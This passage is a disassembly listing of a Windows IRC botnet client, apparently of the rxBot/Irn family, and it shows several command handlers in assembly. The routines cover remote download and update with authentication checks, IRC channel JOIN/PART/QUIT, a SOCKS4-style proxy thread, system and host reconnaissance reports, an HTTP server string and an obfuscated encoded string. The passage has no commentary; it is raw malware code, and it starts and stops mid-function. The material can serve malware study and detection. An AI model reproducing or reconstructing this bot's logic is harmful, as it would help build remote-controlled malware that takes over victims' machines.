					; sub_40177B+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_401846:				; CODE XREF: sub_40177B+C4j
		test	eax, eax
		jnz	loc_4019C8
		push	327h
		push	eax
		lea	eax, [ebp-4B8h]
		push	eax
		call	sub_407F20
		push	dword ptr [ebp-4BCh]
		mov	esi, offset dword_420B28
		push	esi
		mov	edi, 0FFh
		lea	eax, [ebp-4B8h]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-4B8h]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_40188A:				; CODE XREF: sub_40177B+114j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40188A
		push	dword ptr [ebp-4C4h]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-4B8h],	dl
		lea	eax, [ebp-3B8h]
		push	22h
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-3B8h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4018BB:				; CODE XREF: sub_40177B+145j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4018BB
		mov	ebx, [ebp-4C0h]
		push	dword ptr [ebx+8]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-3B8h],	dl
		lea	eax, [ebp-395h]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-395h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4018EE:				; CODE XREF: sub_40177B+178j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4018EE
		push	dword ptr [ebx+0Ch]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-395h],	dl
		lea	eax, [ebp-295h]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-295h]
		add	esp, 10h
		lea	esi, [eax+1]

loc_40191B:				; CODE XREF: sub_40177B+1A5j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_40191B
		sub	eax, esi
		mov	[ebp+eax-295h],	cl
		mov	al, [ebp+8]
		mov	[ebp-192h], al
		mov	al, [ebp+0Ch]
		push	4
		mov	[ebp-193h], al
		pop	eax
		cmp	[ebp+1Ch], eax
		jl	short loc_40198B
		mov	[ebp-4BCh], eax

loc_40194B:				; CODE XREF: sub_40177B+203j
		mov	eax, [ebx+eax*4]
		push	3
		mov	edi, offset dword_420B2C
		mov	esi, eax
		pop	ecx
		xor	edx, edx
		repe cmpsb
		jz	short loc_401982
		mov	esi, eax
		push	2
		mov	edi, offset dword_420B30
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_401982
		mov	eax, [ebp-4BCh]
		inc	eax
		cmp	eax, [ebp+1Ch]
		mov	[ebp-4BCh], eax
		jle	short loc_40194B
		jmp	short loc_401992
; ---------------------------------------------------------------------------

loc_401982:				; CODE XREF: sub_40177B+1E1j
					; sub_40177B+1F1j
		mov	byte ptr [ebp-195h], 1
		jmp	short loc_401992
; ---------------------------------------------------------------------------

loc_40198B:				; CODE XREF: sub_40177B+1C8j
		mov	byte ptr [ebp-195h], 0

loc_401992:				; CODE XREF: sub_40177B+205j
					; sub_40177B+20Ej
					; DATA XREF: ...
		push	8
		mov	byte ptr [ebp-194h], 0
		call	sub_40340B
		pop	ecx
		mov	[ebp-4C0h], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_4019EB
		push	offset sub_41BED6
		lea	ecx, [ebp-4B8h]
		mov	edi, offset dword_420B34
		mov	esi, eax
		call	sub_414884
		jmp	short loc_4019EB
; ---------------------------------------------------------------------------

loc_4019C8:				; CODE XREF: sub_40177B+CDj
		push	offset aDlAuthFailure_ ; "DL: Auth Failure."
		push	dword ptr [ebp-4BCh]
		jmp	short loc_4019DB
; ---------------------------------------------------------------------------

loc_4019D5:				; CODE XREF: sub_40177B+2Ej
		push	offset aDlInvalidArgum ; "DL: Invalid Arguments"
		push	eax

loc_4019DB:				; CODE XREF: sub_40177B+258j
		push	dword ptr [ebp+0Ch]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 10h

loc_4019EB:				; CODE XREF: sub_40177B+96j
					; sub_40177B+232j ...
		call	sub_404A2F
		retn	1Ch
sub_40177B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4019F3	proc near		; DATA XREF: _1fieagrn:off_420B9Co
		push	4B8h
		mov	eax, offset loc_41CA8E
		call	sub_4049E5
		cmp	dword ptr [ebp+1Ch], 3
		mov	eax, [ebp+10h]
		mov	edi, [ebp+20h]
		mov	[ebp-4C4h], eax
		mov	eax, [ebp+18h]
		mov	[ebp-4C0h], eax
		mov	[ebp-4BCh], edi
		jl	loc_401BFF
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp-18Fh]
		push	ebx
		push	eax
		mov	[ebp-190h], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp-0CFh]
		push	ebx
		push	eax
		mov	[ebp-0D0h], bl
		call	sub_407F20
		push	dword ptr [edi+4]
		lea	edi, [ebp-190h]
		call	sub_41BDAA
		push	0C0h
		lea	esi, [ebp-0D0h]
		mov	ebx, offset asc_426A78 ; "Ì»¿º¸¼»¶½Í·»Èϸ˷ÌËʷʶȺͷ¹¸»Èº»ÊºÏË̸"...
		call	sub_419EC1
		add	esp, 20h
		cmp	byte ptr [ebp+8], 0
		jz	short loc_401A8F
		cmp	byte_426832, 0
		jz	loc_401C15

loc_401A8F:				; CODE XREF: sub_4019F3+8Dj
		lea	ecx, [ebp-0D0h]
		lea	eax, [ebp-190h]

loc_401A9B:				; CODE XREF: sub_4019F3+C0j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_401AB9
		test	dl, dl
		jz	short loc_401AB5
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_401AB9
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_401A9B

loc_401AB5:				; CODE XREF: sub_4019F3+B0j
		xor	eax, eax
		jmp	short loc_401ABE
; ---------------------------------------------------------------------------

loc_401AB9:				; CODE XREF: sub_4019F3+ACj
					; sub_4019F3+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_401ABE:				; CODE XREF: sub_4019F3+C4j
		test	eax, eax
		jnz	loc_401BF2
		push	327h
		push	eax
		lea	eax, [ebp-4B8h]
		push	eax
		call	sub_407F20
		push	dword ptr [ebp-4C0h]
		mov	esi, offset dword_420B28
		push	esi
		mov	edi, 0FFh
		lea	eax, [ebp-4B8h]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-4B8h]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_401B02:				; CODE XREF: sub_4019F3+114j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B02
		push	dword ptr [ebp-4C4h]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-4B8h],	dl
		lea	eax, [ebp-3B8h]
		push	22h
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-3B8h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B33:				; CODE XREF: sub_4019F3+145j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B33
		mov	ebx, [ebp-4BCh]
		push	dword ptr [ebx+8]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-3B8h],	dl
		lea	eax, [ebp-395h]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-395h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B66:				; CODE XREF: sub_4019F3+178j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B66
		push	dword ptr [ebx+0Ch]
		sub	eax, ecx
		push	esi
		mov	[ebp+eax-395h],	dl
		lea	eax, [ebp-295h]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-295h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401B93:				; CODE XREF: sub_4019F3+1A5j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401B93
		sub	eax, ecx
		mov	[ebp+eax-295h],	dl
		mov	al, [ebp+8]
		mov	[ebp-192h], al
		mov	al, [ebp+0Ch]
		push	8
		mov	[ebp-193h], al
		mov	byte ptr [ebp-195h], 1
		mov	byte ptr [ebp-194h], 1
		call	sub_40340B
		pop	ecx
		mov	[ebp-4BCh], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_401C15
		push	offset sub_41BED6
		lea	ecx, [ebp-4B8h]
		mov	edi, offset dword_420B34
		mov	esi, eax
		call	sub_414884
		jmp	short loc_401C15
; ---------------------------------------------------------------------------

loc_401BF2:				; CODE XREF: sub_4019F3+CDj
		push	offset aUpdAuthFailure ; "UPD: Auth Failure."
		push	dword ptr [ebp-4C0h]
		jmp	short loc_401C05
; ---------------------------------------------------------------------------

loc_401BFF:				; CODE XREF: sub_4019F3+2Ej
		push	offset aUpdInvalidArgu ; "UPD: Invalid Arguments."
		push	eax

loc_401C05:				; CODE XREF: sub_4019F3+20Aj
		push	dword ptr [ebp+0Ch]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 10h

loc_401C15:				; CODE XREF: sub_4019F3+96j
					; sub_4019F3+1E4j ...
		call	sub_404A2F
		retn	1Ch
sub_4019F3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401C1D	proc near		; DATA XREF: _1fieagrn:off_420C10o

arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		push	edi
		xor	edi, edi
		inc	edi
		cmp	[ebp+arg_14], edi
		jl	loc_401CF7
		push	esi
		push	1F8h
		call	sub_402A08
		mov	esi, eax
		push	esi
		call	sub_402E05
		push	eax
		push	0
		push	esi

loc_401C44:				; DATA XREF: zbox2z3f:00491C45o
		call	sub_407F20
		add	esp, 14h
		cmp	[ebp+arg_14], edi
		jnz	short loc_401C81
		mov	eax, [ebp+arg_18]
		push	dword ptr [eax+4]
		push	offset dword_420B28
		push	esi
		call	sub_402E05
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_402EAE
		mov	eax, esi
		add	esp, 10h
		lea	edx, [eax+1]

loc_401C73:				; CODE XREF: sub_401C1D+5Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_401C73
		sub	eax, edx
		mov	[eax+esi], cl
		jmp	short loc_401CDB
; ---------------------------------------------------------------------------

loc_401C81:				; CODE XREF: sub_401C1D+32j
		jl	short loc_401CDB
		push	ebx
		mov	ebx, [ebp+arg_18]

loc_401C87:				; CODE XREF: sub_401C1D+BBj
		cmp	edi, 1
		jnz	short loc_401CA8
		push	dword ptr [ebx+4]
		push	offset dword_420B28
		push	esi
		call	sub_402E05
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_402EAE
		add	esp, 10h
		jmp	short loc_401CC3
; ---------------------------------------------------------------------------

loc_401CA8:				; CODE XREF: sub_401C1D+6Dj
		push	dword ptr [ebx+edi*4]
		push	esi
		push	offset dword_420BA0
		push	esi
		call	sub_402E05
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_402EAE
		add	esp, 14h

loc_401CC3:				; CODE XREF: sub_401C1D+89j
		mov	eax, esi
		lea	ecx, [eax+1]

loc_401CC8:				; CODE XREF: sub_401C1D+B0j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401CC8
		sub	eax, ecx
		inc	edi
		cmp	edi, [ebp+arg_14]
		mov	[eax+esi], dl
		jle	short loc_401C87
		pop	ebx

loc_401CDB:				; CODE XREF: sub_401C1D+62j
					; sub_401C1D:loc_401C81j
		push	esi
		push	offset dword_420BA8
		mov	edi, offset dword_427FFC
		call	sub_417ABC
		push	esi
		call	sub_402F5B
		add	esp, 0Ch
		pop	esi
		jmp	short loc_401D07
; ---------------------------------------------------------------------------

loc_401CF7:				; CODE XREF: sub_401C1D+Aj
		push	offset aQuitIrnPowered ; "QUIT :Irn Powered\r\n"
		mov	edi, offset dword_427FFC
		call	sub_417ABC
		pop	ecx

loc_401D07:				; CODE XREF: sub_401C1D+D8j
		pop	edi
		pop	ebp
		retn	1Ch
sub_401C1D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401D0C	proc near		; DATA XREF: _1fieagrn:off_420C18o

arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_14], 1
		push	edi
		jl	short loc_401D4A
		cmp	[ebp+arg_14], 2
		mov	eax, [ebp+arg_18]
		mov	edi, offset dword_427FFC
		jl	short loc_401D39
		push	dword ptr [eax+8]
		push	dword ptr [eax+4]
		push	offset aJoinSS	; "JOIN	%s %s\r\n"
		call	sub_417ABC
		add	esp, 0Ch
		jmp	short loc_401D62
; ---------------------------------------------------------------------------

loc_401D39:				; CODE XREF: sub_401D0C+16j
		push	dword ptr [eax+4]
		push	offset aJoinS	; "JOIN	%s\r\n"
		call	sub_417ABC
		pop	ecx
		pop	ecx
		jmp	short loc_401D62
; ---------------------------------------------------------------------------

loc_401D4A:				; CODE XREF: sub_401D0C+8j
		push	offset aIInsufficientA ; "I: Insufficient Arguments."
		push	[ebp+arg_10]
		push	[ebp+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 10h

loc_401D62:				; CODE XREF: sub_401D0C+2Bj
					; sub_401D0C+3Cj
		pop	edi
		pop	ebp
		retn	1Ch
sub_401D0C	endp


; =============== S U B	R O U T	I N E =======================================



sub_401D67	proc near		; DATA XREF: _1fieagrn:off_420C20o

arg_4		= dword	ptr  8
arg_10		= dword	ptr  14h
arg_14		= dword	ptr  18h
arg_18		= dword	ptr  1Ch

		cmp	[esp+arg_14], 1
		jl	short loc_401D8A
		mov	eax, [esp+arg_18]
		push	edi
		push	dword ptr [eax+4]
		mov	edi, offset dword_427FFC
		push	offset aPartS	; "PART	%s\r\n"
		call	sub_417ABC
		pop	ecx
		pop	ecx
		pop	edi
		jmp	short locret_401DA4
; ---------------------------------------------------------------------------

loc_401D8A:				; CODE XREF: sub_401D67+5j
		push	offset aIInsufficientA ; "I: Insufficient Arguments."
		push	[esp+4+arg_10]
		push	[esp+8+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 10h

locret_401DA4:				; CODE XREF: sub_401D67+21j
		retn	1Ch
sub_401D67	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401DA7	proc near		; DATA XREF: _1fieagrn:off_420C38o

var_118		= dword	ptr -118h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 118h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_10]
		push	ebx
		mov	[ebp+var_118], eax
		push	esi
		push	edi
		xor	eax, eax
		xor	ecx, ecx
		mov	[ebp+var_14], cl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		push	0FFh
		stosb
		push	ecx
		lea	eax, [ebp+var_113]
		push	eax
		mov	[ebp+var_114], cl
		call	sub_407F20
		push	dword_427FFC
		lea	esi, [ebp+var_14]
		call	sub_4197B6
		push	100h
		lea	esi, [ebp+var_114]
		mov	ebx, offset byte_426671
		call	sub_419EC1
		mov	eax, esi
		push	eax
		push	dword_427BD4
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aHttpSDS	; "http://%s:%d/%s"
		push	[ebp+var_118]
		push	[ebp+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		mov	ecx, [ebp+var_4]
		add	esp, 30h
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn	1Ch
sub_401DA7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401E4A	proc near		; DATA XREF: _1fieagrn:off_420C84o

var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= dword	ptr -134h
var_130		= dword	ptr -130h
var_12C		= dword	ptr -12Ch
var_128		= byte ptr -128h
var_120		= byte ptr -120h
var_20		= word ptr -20h
var_1E		= byte ptr -1Eh
var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	0FFFFFFFFh
		push	offset loc_41CA53
		mov	eax, large fs:0
		push	eax
		sub	esp, 130h
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+13Ch+var_14], eax
		push	ebx
		push	esi
		push	edi
		mov	eax, dword_423064
		xor	eax, esp
		push	eax
		lea	eax, [esp+14Ch+var_C]
		mov	large fs:0, eax
		mov	edi, [ebp+arg_10]
		mov	esi, [ebp+arg_18]
		push	104h
		lea	eax, [esp+150h+var_120]
		push	0
		push	eax
		mov	[esp+158h+var_13C], edi
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		push	offset dword_420B28
		lea	eax, [esp+154h+var_120]
		push	0FFh
		push	eax
		call	sub_402EAE
		lea	eax, [esp+15Ch+var_120]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_401EC7:				; CODE XREF: sub_401E4A+82j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_401EC7
		mov	ebx, [ebp+arg_4]
		sub	eax, ecx
		cmp	[ebp+arg_14], 1
		mov	[esp+eax+14Ch+var_120],	dl
		mov	[esp+14Ch+var_1E], bl
		jl	short loc_401EFE
		push	dword ptr [esi+4]
		call	sub_40416B
		pop	ecx
		push	dword ptr [esi+4]
		mov	word_434F98, ax
		call	sub_40416B
		pop	ecx
		jmp	short loc_401F0A
; ---------------------------------------------------------------------------

loc_401EFE:				; CODE XREF: sub_401E4A+98j
		mov	ax, word_426830
		mov	word_434F98, ax

loc_401F0A:				; CODE XREF: sub_401E4A+B2j
		mov	[esp+14Ch+var_20], ax
		mov	eax, dword_43529C
		mov	eax, [eax]
		mov	[esp+14Ch+var_134], eax
		mov	eax, offset dword_435298
		mov	[esp+14Ch+var_138], eax
		mov	[esp+14Ch+var_130], eax

loc_401F2A:				; CODE XREF: sub_401E4A+11Fj
		mov	eax, dword_43529C
		lea	edi, [esp+14Ch+var_130]
		lea	esi, [esp+14Ch+var_138]
		mov	[esp+14Ch+var_12C], eax
		call	sub_40166F
		test	al, al
		jz	short loc_401F6B
		mov	edi, offset off_420C3C
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	4
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_401F9A
		lea	edi, [esp+14Ch+var_128]
		lea	esi, [esp+14Ch+var_138]
		call	sub_40168C
		jmp	short loc_401F2A
; ---------------------------------------------------------------------------

loc_401F6B:				; CODE XREF: sub_401E4A+F8j
		push	8
		call	sub_40340B
		pop	ecx
		mov	[esp+14Ch+var_13C], eax
		and	[esp+14Ch+var_4], 0
		test	eax, eax
		jz	short loc_401FB1
		push	offset sub_4145BE
		lea	ecx, [esp+150h+var_120]
		mov	edi, offset off_420C3C
		mov	esi, eax
		call	sub_414884
		jmp	short loc_401FB1
; ---------------------------------------------------------------------------

loc_401F9A:				; CODE XREF: sub_401E4A+110j
		push	offset aS4AlreadyRunni ; "S4:Already Running"
		push	[esp+150h+var_13C]
		push	ebx
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 10h

loc_401FB1:				; CODE XREF: sub_401E4A+137j
					; sub_401E4A+14Ej
		mov	ecx, [esp+14Ch+var_C]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [esp+13Ch+var_14]
		xor	ecx, esp
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_401E4A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401FD7	proc near		; DATA XREF: _1fieagrn:off_420C8Co

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 18h
		push	esi
		push	edi
		push	dword_428128
		call	ds:dword_41D280	; closesocket
		mov	eax, dword_43529C
		mov	eax, [eax]
		mov	[esp+20h+var_14], eax
		mov	eax, offset dword_435298
		mov	[esp+20h+var_18], eax
		mov	[esp+20h+var_10], eax

loc_402006:				; CODE XREF: sub_401FD7+6Ej
		mov	eax, dword_43529C
		lea	edi, [esp+20h+var_10]
		lea	esi, [esp+20h+var_18]
		mov	dword ptr [esp+20h+var_C], eax
		call	sub_40166F
		test	al, al
		jz	short loc_40205A
		mov	edi, offset off_420C3C
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	4
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [esp+20h+var_18]
		jz	short loc_402047
		lea	edi, [esp+20h+var_8]
		call	sub_40168C
		jmp	short loc_402006
; ---------------------------------------------------------------------------

loc_402047:				; CODE XREF: sub_401FD7+63j
		call	sub_40164F
		mov	eax, [eax]
		call	sub_4147FC
		push	offset aS4ThreadStoppe ; "S4: Thread Stopped"
		jmp	short loc_40205F
; ---------------------------------------------------------------------------

loc_40205A:				; CODE XREF: sub_401FD7+47j
		push	offset aS4NoThreadRunn ; "S4: No Thread	Running"

loc_40205F:				; CODE XREF: sub_401FD7+81j
		push	[ebp+arg_10]
		push	[ebp+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 10h
		pop	edi
		pop	esi
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_401FD7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40207A	proc near		; DATA XREF: _1fieagrn:off_420D4Co

var_444		= byte ptr -444h
var_440		= dword	ptr -440h
var_43C		= dword	ptr -43Ch
var_438		= byte ptr -438h
var_430		= dword	ptr -430h
var_42C		= dword	ptr -42Ch
var_418		= byte ptr -418h
var_417		= byte ptr -417h
var_408		= byte ptr -408h
var_407		= byte ptr -407h
var_308		= byte ptr -308h
var_307		= byte ptr -307h
var_208		= byte ptr -208h
var_207		= byte ptr -207h
var_108		= byte ptr -108h
var_107		= byte ptr -107h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 444h
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+444h+var_4], eax
		mov	eax, [ebp+arg_10]
		push	ebx
		push	esi
		push	edi
		mov	esi, 0FFh
		push	esi
		mov	[esp+454h+var_43C], eax
		xor	ebx, ebx
		lea	eax, [esp+454h+var_107]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_108], 0
		call	sub_407F20
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+454h+var_307]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_308], bl
		call	sub_407F20
		xor	eax, eax
		mov	[esp+45Ch+var_418], bl
		lea	edi, [esp+45Ch+var_417]
		stosd
		stosd
		stosd
		stosw
		add	esp, 0Ch
		push	esi
		stosb
		lea	eax, [esp+454h+var_407]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_408], bl
		call	sub_407F20
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+454h+var_207]
		push	ebx
		push	eax
		mov	[esp+45Ch+var_208], bl
		call	sub_407F20
		add	esp, 0Ch
		push	8
		pop	ecx
		xor	eax, eax
		lea	edi, [esp+450h+var_438]
		rep stosd
		lea	eax, [esp+450h+var_438]
		mov	ebx, 100h
		push	eax
		mov	[esp+454h+var_440], ebx
		call	ds:off_41D098
		mov	edi, [esp+450h+var_430]
		mov	ecx, [esp+450h+var_42C]
		shr	edi, 14h
		shr	ecx, 14h
		mov	eax, edi
		sub	eax, ecx
		push	1
		mov	ecx, ebx
		lea	esi, [esp+454h+var_108]
		mov	dword ptr [esp+454h+var_444], eax
		call	sub_419641
		pop	ecx
		call	sub_41AD77
		push	1
		push	ebx
		lea	esi, [esp+458h+var_308]
		call	sub_41960F
		push	dword_427FFC
		lea	esi, [esp+45Ch+var_418]
		call	sub_4197B6
		add	esp, 0Ch
		lea	eax, [esp+450h+var_440]
		push	eax
		lea	eax, [esp+454h+var_408]
		push	eax
		call	ds:off_41D048
		push	ebx
		lea	eax, [esp+454h+var_208]
		push	eax
		call	ds:dword_41D0F0	; GetSystemDirectoryA
		call	sub_419590
		push	dword_427BEC
		lea	eax, [esp+454h+var_208]
		push	dword_427BE8
		push	dword_427BE4
		push	dword_427BE0
		push	dword_427BDC
		push	dword_427BD8
		push	eax
		lea	eax, [esp+46Ch+var_408]
		push	eax
		mov	eax, esi
		push	eax
		lea	eax, [esp+474h+var_308]
		push	eax
		push	edi
		push	dword ptr [esp+47Ch+var_444]
		mov	esi, offset byte_428130
		push	dword_428230
		lea	eax, [esp+484h+var_108]
		push	esi
		push	dword_428234
		push	eax
		push	offset aSystemSCpuIXS@ ; "System: %s [CPU: %i x	%s @ %dMhz] [RAM:"...
		push	[esp+494h+var_43C]
		push	[ebp+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		push	108h
		push	0
		push	esi
		call	sub_407F20
		mov	ecx, [esp+4ACh+var_4]
		add	esp, 5Ch
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_40207A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40223C	proc near		; DATA XREF: _1fieagrn:off_420D54o

var_18		= dword	ptr -18h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_10]
		push	esi
		push	edi
		push	dword_427FFC
		mov	[ebp+var_14], 0
		xor	eax, eax
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp+var_14]
		stosb
		call	sub_4197B6
		pop	ecx
		mov	eax, esi
		push	eax
		call	ds:dword_41D264	; inet_addr
		push	2
		mov	[ebp+var_18], eax
		push	4
		lea	eax, [ebp+var_18]
		push	eax
		call	ds:dword_41D224	; gethostbyaddr
		test	eax, eax
		jnz	short loc_4022A9
		mov	eax, esi
		push	eax
		push	offset aNetIpSHostNA ; "Net: IP: %s Host: N/A"
		push	ebx
		push	[ebp+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 14h
		jmp	short loc_4022C5
; ---------------------------------------------------------------------------

loc_4022A9:				; CODE XREF: sub_40223C+50j
		push	dword ptr [eax]
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aNetIpSHostS ; "Net: IP:	%s Host: %s"
		push	ebx
		push	[ebp+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 18h

loc_4022C5:				; CODE XREF: sub_40223C+6Bj
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn	1Ch
sub_40223C	endp


; =============== S U B	R O U T	I N E =======================================



sub_4022D6	proc near		; DATA XREF: _1fieagrn:off_420EA4o
		push	60h
		mov	eax, offset loc_41CA21
		call	sub_4049E5
		mov	eax, [ebp+18h]
		mov	[ebp-68h], eax
		xor	eax, eax
		mov	byte ptr [ebp-30h], 0
		lea	edi, [ebp-2Fh]
		stosd
		stosd
		stosd
		mov	ebx, [ebp+20h]
		stosw
		and	dword ptr [ebp-58h], 0
		and	dword ptr [ebp-48h], 0
		stosb
		xor	eax, eax
		mov	byte ptr [ebp-20h], 0
		lea	edi, [ebp-1Fh]
		stosd
		stosd
		stosd
		stosw
		stosb
		or	edi, 0FFFFFFFFh
		cmp	byte_434F8D, 0
		mov	[ebp-50h], ebx
		mov	byte ptr [ebp-41h], 0
		mov	[ebp-5Ch], edi
		mov	[ebp-60h], edi
		mov	[ebp-64h], edi
		mov	[ebp-6Ch], edi
		jnz	short loc_40233D
		call	sub_41BD26
		test	al, al
		jz	loc_4027EC

loc_40233D:				; CODE XREF: sub_4022D6+58j
		cmp	byte_427EF4, 0
		jnz	short loc_402353
		call	sub_419507
		test	al, al
		jz	loc_4027EC

loc_402353:				; CODE XREF: sub_4022D6+6Ej
		and	dword ptr [ebp-54h], 0
		mov	ecx, offset dword_424528
		mov	eax, ecx
		lea	esi, [eax+1]

loc_402361:				; CODE XREF: sub_4022D6+90j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_402361
		jmp	short loc_4023B0
; ---------------------------------------------------------------------------

loc_40236A:				; CODE XREF: sub_4022D6+DCj
		mov	edx, [ebx+4]
		mov	eax, ecx

loc_40236F:				; CODE XREF: sub_4022D6+B1j
		mov	cl, [eax]
		cmp	cl, [edx]
		jnz	short loc_40238D

loc_402375:				; DATA XREF: zbox2z3f:00491C85w
		test	cl, cl
		jz	short loc_402389
		mov	cl, [eax+1]
		cmp	cl, [edx+1]
		jnz	short loc_40238D
		inc	eax
		inc	eax
		inc	edx
		inc	edx
